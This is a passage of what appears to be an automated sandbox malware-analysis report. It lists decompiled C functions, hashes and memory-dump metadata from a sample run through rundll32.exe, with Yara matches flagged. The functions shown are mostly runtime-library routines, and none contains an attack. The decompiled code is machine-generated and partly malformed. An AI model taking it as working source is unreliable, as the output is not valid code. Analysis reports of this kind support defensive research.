                				 *((long long*)(_t133 + 0x20)) =  *((long long*)(_t133 + 0x20)) + 8;
                				_t99 =  *( *((intOrPtr*)(_t133 + 0x20)) - 8);
                				 *(_t133 + 0x34) = _t99;
                				if (_t99 >= 0) goto 0x205fc079;
                				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000004;
                				 *(_t133 + 0x34) =  ~_t99;
                				goto 0x205fc0d3;
                				_t91 =  *((intOrPtr*)(_t133 + 0x41));
                				if (_t91 == 0x20) goto 0x205fc0ac;
                				if (_t91 == 0x23) goto 0x205fc0a6;
                				if (_t91 == 0x2b) goto 0x205fc0a0;
                				if (_t91 == 0x2d) goto 0x205fc09a;
                				if (_t91 != 0x30) goto 0x205fc0d7;
                				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000008;
                				goto 0x205fc0d7;
                				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000004;
                				goto 0x205fc0d7;
                				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000001;
                				goto 0x205fc0d7;
                				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000020;
                				goto 0x205fc0d7;
                				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000002;
                				goto 0x205fc0d7;
                				 *(_t133 + 0x34) =  *(_t133 + 0x34) & 0x00000000;
                				 *(_t133 + 0x30) =  *(_t133 + 0x30) & 0x00000000;
                				 *(_t133 + 0x3c) =  *(_t133 + 0x3c) & 0x00000000;
                				 *((char*)(_t133 + 0x40)) = 0;
                				 *(_t133 + 0x38) = _t105;
                				 *((char*)(_t133 + 0x54)) = 0;
                				goto 0x205fc0d7;
                				if (E00000215215205FC420(_t133) == 0) goto 0x205fc122;
                				_t101 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18))));
                				 *((char*)(_t133 + 0x41)) = _t101;
                				if (_t101 != 0) goto 0x205fbf89;
                				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 1;
                				 *((intOrPtr*)(_t133 + 0x470)) =  *((intOrPtr*)(_t133 + 0x470)) + 1;
                				if ( *((intOrPtr*)(_t133 + 0x470)) != 2) goto 0x205fbf7c;
                				return  *((intOrPtr*)(_t133 + 0x28));
                			}














                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID: %02x
                • API String ID: 3215553584-560843007
                • Opcode ID: 274589d0b80415c0360180f46b1368b715075c39fab3c08802e67829739cb148
                • Instruction ID: 26577bc37044df152b7d14dece8756303fbebe20a02736be739dded4cebb4244
                • Opcode Fuzzy Hash: 274589d0b80415c0360180f46b1368b715075c39fab3c08802e67829739cb148
                • Instruction Fuzzy Hash: FA515273246A60CAF7688E38824D3ED3FA5FBA7B59F1411A5CE424229DCB3DC486C705
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 34%
                			E00007FFA7FFA535EA718(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, signed long long _a24, long long _a32, long long _a40, long long _a64) {
                				signed int _t25;
                				void* _t27;
                				void* _t36;
                				void* _t38;
                				unsigned long long _t57;
                				unsigned long long _t66;
                				void* _t67;
                				signed long long _t72;
                				signed long long _t73;
                				signed long long _t75;
                				signed long long _t77;
                				signed long long _t78;
                
                				asm("movss [esp+0x8], xmm0");
                				asm("movaps xmm4, xmm1");
                				asm("movaps xmm1, xmm0");
                				asm("xorps xmm2, xmm2");
                				asm("cvtss2sd xmm2, xmm1");
                				asm("xorps xmm3, xmm3");
                				asm("movsd [esp+0x70], xmm2");
                				_t72 = _a24;
                				asm("cvtss2sd xmm3, xmm4");
                				_t75 = _t72 & 0xffffffff;
                				_t57 = _t72 >> 0x34;
                				asm("movsd [esp+0x70], xmm3");
                				_t78 = _a24;
                				_t77 = _t78 & 0xffffffff;
                				_t66 = _t78 >> 0x34;
                				if (_t57 - 1 < 0) goto 0x535ea8c4;
                				if (_t57 - 0x7fe > 0) goto 0x535ea8cc;
                				if (_t66 - 1 - 0x7fd > 0) goto 0x535ea8c4;
                				if (_t75 != _t77) goto 0x535ea7c2;
                				_t73 = _t72 & 0x00000000;
                				_a24 = _t73;
                				asm("movsd xmm0, [esp+0x70]");
                				asm("cvtpd2ps xmm0, xmm0");
                				goto 0x535ea957;
                				_a24 = _t75;
                				asm("movsd xmm2, [esp+0x70]");
                				_a24 = _t77;
                				asm("movsd xmm3, [esp+0x70]");
                				_t36 = _t75 - _t77;
                				if (_t36 >= 0) goto 0x535ea7f8;
                				asm("xorps xmm0, xmm0");
                				asm("comiss xmm0, xmm1");
                				if (_t36 <= 0) goto 0x535ea7ec;
                				asm("xorps xmm2, [0x86974]");
                				asm("xorps xmm0, xmm0");
                				asm("cvtsd2ss xmm0, xmm2");
                				goto 0x535ea957;
                				asm("stmxcsr dword [esp+0x68]");
                				r8d = _a16;
                				if (_t57 - _t66 <= 0) goto 0x535ea87c;
                				_t67 = _t66 + 0x2aaaaaab;
                				_a24 = _t25 << 0x34;
                				asm("movsd xmm0, [esp+0x70]");
                				asm("mulsd xmm0, xmm3");
                				_a24 = 0;
                				asm("movsd xmm4, [esp+0x70]");
                				asm("movaps xmm3, xmm0");
                				_t38 = _t67;
                				if (_t38 <= 0) goto 0x535ea87c;
                				asm("movaps xmm0, xmm2");
                				asm("divsd xmm0, xmm3");
                				asm("cvttsd2si eax, xmm0");
                				asm("movd xmm1, eax");
                				asm("cvtdq2pd xmm1, xmm1");
                				asm("mulsd xmm1, xmm3");
                				asm("mulsd xmm3, xmm4");
                				asm("subsd xmm2, xmm1");
                				if (_t38 != 0) goto 0x535ea857;
                				asm("movaps xmm0, xmm2");
                				_a16 = r8d;
                				asm("divsd xmm0, xmm3");
                				asm("cvttsd2si eax, xmm0");
                				asm("movd xmm1, eax");
                				asm("cvtdq2pd xmm1, xmm1");
                				asm("mulsd xmm1, xmm3");
                				asm("subsd xmm2, xmm1");
                				asm("movsd [esp+0x70], xmm2");
                				asm("ldmxcsr dword [esp+0x68]");
                				asm("xorps xmm0, xmm0");
                				asm("comiss xmm0, [esp+0x60]");
                				asm("movaps xmm0, xmm2");
                				if (_t38 <= 0) goto 0x535ea8bb;
                				asm("xorps xmm0, [0x868a5]");
                				asm("cvtsd2ss xmm0, xmm0");
                				goto 0x535ea957;
                				if (_t67 - 1 - 0x7fe <= 0) goto 0x535ea8e3;
                				if ((0xffffffff & _t73) == 0) goto 0x535ea917;
                				asm("movss [esp+0x60], xmm1");
                				goto 0x535ea900;
                				if (_t67 - 0x7fe <= 0) goto 0x535ea90d;
                				if ((0xffffffff & _t78) == 0) goto 0x535ea957;
                				asm("movss [esp+0x60], xmm4");
                				goto 0x535f0dbc;
                				if (_a8 - 1 >= 0) goto 0x535ea917;
                				if (_t67 - 1 >= 0) goto 0x535ea957;
                				_a64 = 2;
                				asm("movss [esp+0x38], xmm4");
                				r9d = 1;
                				asm("movss [esp+0x30], xmm1");
                				r8d = 0xffc00000;
                				_a40 = 0x21;
                				_a32 = 8;
                				return E00007FFA7FFA535F0C6C(_t27, _t75 + 0x15, _t67 - 1, 0x53671ccc, _t67, _t73);
                			}
















                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _handle_errorf
                • String ID: !$fmodf
                • API String ID: 2315412904-1366221206
                • Opcode ID: 809ba85aedd89a7189055f61ead85860735a5eea0ac88f8d965bf70d4784b19b
                • Instruction ID: bffad52782ab9adb1ac216f743baebd478a33d63fd8551fb4a0f8024e73271d4
                • Opcode Fuzzy Hash: 809ba85aedd89a7189055f61ead85860735a5eea0ac88f8d965bf70d4784b19b
                • Instruction Fuzzy Hash: A851EC32D2CF854BD612C7355441239A2A6EFD7390F14D336FA5E76AE5DB2CE4829E00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E000002152152060D870(void* __ebx, void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                				void* _t11;
                				void* _t13;
                				intOrPtr* _t21;
                				intOrPtr* _t35;
                
                				_t21 = _t35;
                				 *((long long*)(_t21 + 8)) = __rbx;
                				 *((long long*)(_t21 + 0x10)) = __rbp;
                				 *((long long*)(_t21 + 0x18)) = __rsi;
                				 *((long long*)(_t21 + 0x20)) = __rdi;
                				r15b = r9b;
                				_t10 =  >  ? __ebx : 0;
                				_t11 = ( >  ? __ebx : 0) + 9;
                				if (__rdx - _t21 > 0) goto 0x2060d8d5;
                				_t13 = E0000021521520603944(_t21);
                				 *_t21 = 0x22;
                				E00000215215205FAABC(_t13);
                				return 0x22;
                			}








                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID: e+000$gfff
                • API String ID: 3215553584-3030954782
                • Opcode ID: f0870509f4bf2c1319244e35407b9456a7ad99be4f2c05992efcf4f480597c09
                • Instruction ID: ec8faed8d9b780c307538c5e1dd67bde41f22ea5541e1c9a6bbd6ea16c42abaf
                • Opcode Fuzzy Hash: f0870509f4bf2c1319244e35407b9456a7ad99be4f2c05992efcf4f480597c09
                • Instruction Fuzzy Hash: 5D512373755BD0C6E7348B39984839A6B92FBE1B90F1893A1DA9847BDECA3DD440C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 48%
                			E00007FFA7FFA535E7350(void* __ecx, void* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, long long _a16, signed int _a24, char _a32) {
                				long long _v56;
                				void* __rdi;
                				void* __rsi;
                				void* __rbp;
                				void* _t26;
                				intOrPtr* _t48;
                				long long* _t49;
                				long long _t52;
                				long long _t58;
                				void* _t60;
                				long long _t78;
                				long long _t81;
                				long long _t82;
                				intOrPtr* _t83;
                				void* _t87;
                
                				_t60 = __rcx;
                				_a8 = __rbx;
                				_t2 = _t60 - 1; // -1
                				_t48 = _t2;
                				r14d = __ecx;
                				if (_t48 - 1 <= 0) goto 0x535e7384;
                				_t26 = E00007FFA7FFA535E8380(_t48);
                				asm("push cs");
                				 *_t48 =  *_t48 + _t26;
                				goto 0x535e74b3;
                				E00007FFA7FFA535EEA94();
                				r8d = 0x104;
                				GetModuleFileNameA(??, ??, ??);
                				_t83 =  *0x53755730; // 0x2151e483370
                				 *0x53755740 = 0x53754cf0;
                				if (_t83 == 0) goto 0x535e73bb;
                				if ( *_t83 != dil) goto 0x535e73be;
                				_t49 =  &_a32;
                				_a24 = 0;
                				_v56 = _t49;
                				r8d = 0;
                				_a32 = 0;
                				E00007FFA7FFA535E7130(0x53754cf0, 0x53754cf0, 0, 0, 0x53754cf0, _t87, __r8,  &_a24);
                				r8d = 1;
                				E00007FFA7FFA535E72EC(_a24, _a32, __r8);
                				_t58 = _t49;
                				if (_t49 != 0) goto 0x535e740f;
                				E00007FFA7FFA535E8380(_t49);
                				_t10 = _t58 + 0xc; // 0xc
                				_t81 = _t10;
                				 *_t49 = _t81;
                				goto 0x535e74ae;
                				_v56 =  &_a32;
                				E00007FFA7FFA535E7130(_t58, 0x53754cf0, _t58, _t81, 0x53754cf0, _t87, _t49 + _a24 * 8,  &_a24);
                				if (r14d != 1) goto 0x535e7445;
                				_t52 = _a24 - 1;
                				 *0x53755720 = _t58;
                				 *0x5375571c = _t52;
                				goto 0x535e7408;
                				_a16 = _t81;
                				0x535ee390();
                				if (_t52 == 0) goto 0x535e7474;
                				E00007FFA7FFA535E7E58(_t52, _a16);
                				_a16 = _t81;
                				E00007FFA7FFA535E7E58(_t52, _t58);
                				_t82 = _t52;
                				goto 0x535e74b3;
                				_t78 = _a16;
                				if ( *_t78 == _t82) goto 0x535e748f;
                				if ( *((intOrPtr*)(_t78 + 8)) != _t82) goto 0x535e7483;
                				 *0x5375571c = _t82 + 1;
                				_a16 = _t82;
                				 *0x53755720 = _t78;
                				E00007FFA7FFA535E7E58(_t78 + 8, 0);
                				_a16 = _t82;
                				return E00007FFA7FFA535E7E58(_t78 + 8, _t58);
                			}



















                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: FileModuleName_invalid_parameter_noinfo
                • String ID: C:\Windows\SYSTEM32\rundll32.exe
                • API String ID: 3307058713-2484965969
                • Opcode ID: 0b6cb0882f23a2b5e3a001a1a1574599cc91a4ef05d18a512e42ec2301af3a4b
                • Instruction ID: 7db2ba504eb390c77247faff789e8d262208319ca8554e8c7cd5565de7da5005
                • Opcode Fuzzy Hash: 0b6cb0882f23a2b5e3a001a1a1574599cc91a4ef05d18a512e42ec2301af3a4b
                • Instruction Fuzzy Hash: FD41A132A28F528AEB15DF31A4400BC6BAAEF86BD0B4C9075ED4EA7745DF3DE4419340
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 52%
                			E000002152152060B210(void* __ecx, void* __edx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
                				long long _v56;
                				void* __rdi;
                				void* __rsi;
                				void* __rbp;
                				void* _t27;
                				intOrPtr _t36;
                				intOrPtr* _t63;
                				long long _t69;
                				void* _t71;
                				long long _t85;
                				signed int _t86;
                				intOrPtr* _t87;
                				void* _t90;
                
                				_t71 = __rcx;
                				_a8 = __rbx;
                				_t2 = _t71 - 1; // -1
                				r14d = __ecx;
                				if (_t2 - 1 <= 0) goto 0x2060b244;
                				_t27 = E0000021521520603944(__rax);
                				 *__rax = 0x16;
                				E00000215215205FAABC(_t27);
                				goto 0x2060b373;
                				E0000021521520610B00();
                				r8d = 0x104;
                				GetModuleFileNameA(??, ??, ??);
                				_t87 =  *0x20683078; // 0x2151e483370
                				 *0x20683088 = 0x20682810;
                				if (_t87 == 0) goto 0x2060b27b;
                				if ( *_t87 != dil) goto 0x2060b27e;
                				_t63 =  &_a32;
                				_a24 = _t86;
                				_v56 = _t63;
                				r8d = 0;
                				_a32 = _t86;
                				E000002152152060AFF0(0x20682810, 0x20682810, 0x20682810, _t86, 0x20682810, _t90, __r8,  &_a24);
                				r8d = 1;
                				E000002152152060B1AC(_a24, _a32, __r8);
                				_t69 = _t63;
                				if (_t63 != 0) goto 0x2060b2cf;
                				E0000021521520603944(_t63);
                				_t10 = _t69 + 0xc; // 0xc
                				 *_t63 = _t10;
                				goto 0x2060b36e;
                				_v56 =  &_a32;
                				E000002152152060AFF0(_t69, 0x20682810, _t69, _t86, 0x20682810, _t90, _t63 + _a24 * 8,  &_a24);
                				if (r14d != 1) goto 0x2060b305;
                				_t36 = _a24 - 1;
                				 *0x20683068 = _t69;
                				 *0x20683060 = _t36;
                				goto 0x2060b2c8;
                				_a16 = _t86;
                				0x206148f4();
                				if (_t36 == 0) goto 0x2060b334;
                				E000002152152060A780( &_a32, _a16);
                				_a16 = _t86;
                				E000002152152060A780( &_a32, _t69);
                				goto 0x2060b373;
                				_t85 = _a16;
                				if ( *_t85 == _t86) goto 0x2060b34f;
                				if ( *((intOrPtr*)(_t85 + 8)) != _t86) goto 0x2060b343;
                				 *0x20683060 = 0;
                				_a16 = _t86;
                				 *0x20683068 = _t85;
                				E000002152152060A780(_t85 + 8, _t86 + 1);
                				_a16 = _t86;
                				E000002152152060A780(_t85 + 8, _t69);
                				return _t36;
                			}
















                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: FileModuleName_invalid_parameter_noinfo
                • String ID: C:\Windows\SYSTEM32\rundll32.exe
                • API String ID: 3307058713-2484965969
                • Opcode ID: a13a5f74116d454d1eb76d9533dac3d223ecefdb96e38d6ae60cc9efe777d0a2
                • Instruction ID: 3c15e4d979a7db09759cd7d2aceda58df9852c685e8dbb8529379fb9db5df11f
                • Opcode Fuzzy Hash: a13a5f74116d454d1eb76d9533dac3d223ecefdb96e38d6ae60cc9efe777d0a2
                • Instruction Fuzzy Hash: F241BD37282E71C5EB249F2598442EE63A6FFA4BC0F348065EE4943B4DEE35E485C340
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 48%
                			E0000021521520613814() {
                				intOrPtr _t35;
                				void* _t36;
                				void* _t37;
                				void* _t41;
                				void* _t47;
                				void* _t49;
                				void* _t50;
                				void* _t51;
                				void* _t52;
                				void* _t59;
                
                				_t47 = _t51;
                				_t50 = _t47 - 0x5f;
                				_t52 = _t51 - 0x90;
                				asm("movaps [eax-0x18], xmm6");
                				asm("movaps xmm6, xmm2");
                				if (r9d == 1) goto 0x2061394c;
                				_t41 = r9d - 2;
                				if (_t41 == 0) goto 0x20613919;
                				if (_t41 <= 0) goto 0x2061398b;
                				if (r9d - 5 <= 0) goto 0x2061390a;
                				if (r9d == 6) goto 0x206138dc;
                				if (r9d == 7) goto 0x206138a3;
                				if (r9d != 9) goto 0x2061398b;
                				 *(_t50 + 0x17) =  *(_t50 + 0x17) & 0x00000000;
                				_t4 = _t47 + 1; // 0x3
                				r9d = _t4;
                				 *((intOrPtr*)(_t52 + 0x40)) = 2;
                				asm("movss [esp+0x38], xmm1");
                				asm("movss [esp+0x30], xmm0");
                				 *(_t52 + 0x28) = 0x22;
                				asm("movss [ebp+0x17], xmm6");
                				 *((intOrPtr*)(_t52 + 0x20)) = 0x11;
                				goto 0x2061397a;
                				 *(_t50 + 0x1f) =  *(_t50 + 0x1f) & 0x00000000;
                				r9d = 4;
                				 *((intOrPtr*)(_t52 + 0x40)) = 2;
                				asm("movss [esp+0x38], xmm1");
                				asm("movss [esp+0x30], xmm0");
                				 *(_t52 + 0x28) = 0x22;
                				asm("movss [ebp+0x1f], xmm6");
                				 *((intOrPtr*)(_t52 + 0x20)) = 0x12;
                				goto 0x2061397a;
                				 *(_t50 + 0x27) =  *(_t50 + 0x27) & 0x00000000;
                				r9d = 1;
                				 *((intOrPtr*)(_t52 + 0x40)) = 2;
                				asm("movss [esp+0x38], xmm1");
                				asm("movss [esp+0x30], xmm0");
                				asm("movss [ebp+0x27], xmm6");
                				 *(_t52 + 0x28) = 0x21;
                				goto 0x20613972;
                				asm("movss [ebp+0x7f], xmm6");
                				_t35 = E0000021521520617FBC(2,  *((intOrPtr*)(_t50 + 0x7f)));
                				goto 0x2061398e;
                				 *(_t50 + 0x2f) =  *(_t50 + 0x2f) & 0x00000000;
                				r9d = _t35;
                				 *((intOrPtr*)(_t52 + 0x40)) = _t35;
                				asm("movss [esp+0x38], xmm1");
                				asm("movss [esp+0x30], xmm0");
                				 *(_t52 + 0x28) = 0x22;
                				asm("movss [ebp+0x2f], xmm6");
                				 *((intOrPtr*)(_t52 + 0x20)) = 4;
                				goto 0x2061397a;
                				 *(_t50 + 0x37) =  *(_t50 + 0x37) & 0x00000000;
                				 *((intOrPtr*)(_t52 + 0x40)) = _t35;
                				asm("movss [esp+0x38], xmm1");
                				asm("movss [esp+0x30], xmm0");
                				 *(_t52 + 0x28) =  *(_t52 + 0x28) & 0x00000000;
                				asm("movss [ebp+0x37], xmm6");
                				r9d = 0;
                				 *((intOrPtr*)(_t52 + 0x20)) = 8;
                				_t36 = E0000021521520617E6C(_t37, 0x1d, r9d, 0x20637230, _t49,  *(_t50 + 0x37), _t59);
                				asm("movaps xmm0, xmm6");
                				asm("movaps xmm6, [esp+0x80]");
                				return _t36;
                			}













                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _handle_errorf
                • String ID: "$powf
                • API String ID: 2315412904-603753351
                • Opcode ID: 6c2342f624db5eedf88f38fb13525dd90f439cd257be43dc1c3e5d194d4eb011
                • Instruction ID: b2cfad94374e8d4286fce903c7e1c64bfdd4dca739b949b3107311d2bd551600
                • Opcode Fuzzy Hash: 6c2342f624db5eedf88f38fb13525dd90f439cd257be43dc1c3e5d194d4eb011
                • Instruction Fuzzy Hash: 87414673925A90DEE770CF22E4847EAF6A0F7E9348F241305FB4601A98DB79D5509F40
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: FileHandleType
                • String ID: @
                • API String ID: 3000768030-2766056989
                • Opcode ID: 4f5111625b1407a19fdabbefee9c8c7e3abfb380d48dda17de014767798d5151
                • Instruction ID: 618d5276e47d146b9cf9da45befc5598c52de1a1d90d6f3e986a99bd73336b0b
                • Opcode Fuzzy Hash: 4f5111625b1407a19fdabbefee9c8c7e3abfb380d48dda17de014767798d5151
                • Instruction Fuzzy Hash: CB218862A28F5249E7658B24D490139265AEFC6F74F2C6376D67F277D4CE38D481E300
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: FileHandleType
                • String ID: @
                • API String ID: 3000768030-2766056989
                • Opcode ID: 3a30d98f43607e73f85b996430d654d6548bd93877278401218b6b0afaff891f
                • Instruction ID: 33c8a4b849ba9fbdd1d592c266a5759db81784c018124ccd4cf63018fb144486
                • Opcode Fuzzy Hash: 3a30d98f43607e73f85b996430d654d6548bd93877278401218b6b0afaff891f
                • Instruction Fuzzy Hash: F821B633656E71C1EB788B6494982AE2A52FBE5774F381345DEAA077DCCA34D881C301
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E00000215215205B2300(signed int __eax, void* __eflags, void* __rcx) {
                				signed int _t4;
                
                				if (__eflags == 0) goto 0x205b231f;
                				_t4 = __eax | 0xffffffff;
                				asm("lock xadd [ecx+0x30], eax");
                				if (_t4 == 1) goto 0x20593df0;
                				return _t4;
                			}




                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CompletionErrorLastPostQueuedStatus
                • String ID: pqcs
                • API String ID: 1506555858-2559862021
                • Opcode ID: bed270116d7dcb53275eac40756afc65f4fdd3868e38dd205acd798e68efb58d
                • Instruction ID: 5f095075cc9397cc21bba29f379c51993bff844370e6c115a2236c566cd60cf3
                • Opcode Fuzzy Hash: bed270116d7dcb53275eac40756afc65f4fdd3868e38dd205acd798e68efb58d
                • Instruction Fuzzy Hash: 6C21F633712E50C6EFA08B29A4D879E23A0FBE47A4F240315DE6D836E8DF35C4418B40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 60%
                			E00000215215206136F0(void* __rax, intOrPtr _a32, intOrPtr _a40, intOrPtr _a64, intOrPtr _a80) {
                				void* _v40;
                				intOrPtr _v56;
                				intOrPtr _v80;
                				intOrPtr _v88;
                				void* _t17;
                				void* _t18;
                				void* _t20;
                				void* _t22;
                				void* _t25;
                				void* _t28;
                				void* _t32;
                
                				_t25 = __rax;
                				asm("movaps [esp+0x60], xmm6");
                				asm("movaps xmm6, xmm2");
                				_t20 = r9d - 2;
                				if (_t20 == 0) goto 0x206137c8;
                				if (_t20 <= 0) goto 0x20613807;
                				if (r9d - 5 <= 0) goto 0x206137af;
                				_t22 = r9d - 6;
                				if (_t22 == 0) goto 0x20613787;
                				if (_t22 <= 0) goto 0x20613807;
                				if (r9d - 8 <= 0) goto 0x2061375f;
                				if (r9d != 9) goto 0x20613807;
                				_v56 = 2;
                				_t2 = _t25 + 1; // 0x3
                				r9d = _t2;
                				asm("movsd [esp+0x38], xmm1");
                				asm("movsd [esp+0x30], xmm0");
                				_v80 = 0x22;
                				_v88 = 0x11;
                				goto 0x206137eb;
                				_v56 = 2;
                				r9d = 4;
                				asm("movsd [esp+0x38], xmm1");
                				asm("movsd [esp+0x30], xmm0");
                				_v80 = 0x22;
                				_v88 = 0x12;
                				goto 0x206137eb;
                				_v56 = 2;
                				r9d = 1;
                				asm("movsd [esp+0x38], xmm1");
                				asm("movsd [esp+0x30], xmm0");
                				_v80 = 0x21;
                				_v88 = 8;
                				goto 0x206137eb;
                				asm("movsd [esp+0x50], xmm2");
                				asm("movaps xmm6, [esp+0x60]");
                				goto 0x20617fa0;
                				_a64 = 2;
                				r9d = 2;
                				asm("movsd [esp+0x38], xmm1");
                				asm("movsd [esp+0x30], xmm0");
                				_a40 = 0x22;
                				_a32 = 4;
                				asm("movsd [esp+0x50], xmm2");
                				_t17 = E0000021521520617D44(_t18, 0x1d, r9d - 9, 0x20635d34, _t28, _a80, _t32);
                				asm("movaps xmm0, xmm6");
                				asm("movaps xmm6, [esp+0x60]");
                				return _t17;
                			}














                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _handle_error
                • String ID: "$pow
                • API String ID: 1757819995-713443511
                • Opcode ID: 24a612d41a076fe53ae8f8d4ac9651821026316ae4d0cf45d5107ec8e28e6433
                • Instruction ID: 1e1e401a1d1f83cf36624081d62ff3f3a4be57ce980b4fd066188b623173fba2
                • Opcode Fuzzy Hash: 24a612d41a076fe53ae8f8d4ac9651821026316ae4d0cf45d5107ec8e28e6433
                • Instruction Fuzzy Hash: 933110B3919E94C6DB70CF10E4447AAFAA0FBEA344F241305FA8606A98D77DD1859B04
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 53%
                			E0000021521520593DF0(long long __rax, long long __rbx, void* __rcx, void* __rdx, long long _a8) {
                				char _v56;
                				long long _v64;
                				long long _v72;
                				char _v80;
                				long long _v88;
                				void* _t34;
                				void* _t35;
                				long long _t47;
                				long long _t61;
                				void* _t62;
                
                				_t50 = __rbx;
                				_t47 = __rax;
                				_v88 = 0xfffffffe;
                				_a8 = __rbx;
                				_t3 = __rcx + 0x34;
                				 *_t3 = 1;
                				if ( *_t3 != 0) goto 0x20593ec7;
                				_t5 = __rcx + 0x38;
                				 *_t5 = 1;
                				if ( *_t5 != 0) goto 0x20593ec7;
                				r9d = 0;
                				r8d = 0;
                				if (PostQueuedCompletionStatus(??, ??, ??, ??) != 0) goto 0x20593ec7;
                				_t34 = GetLastError();
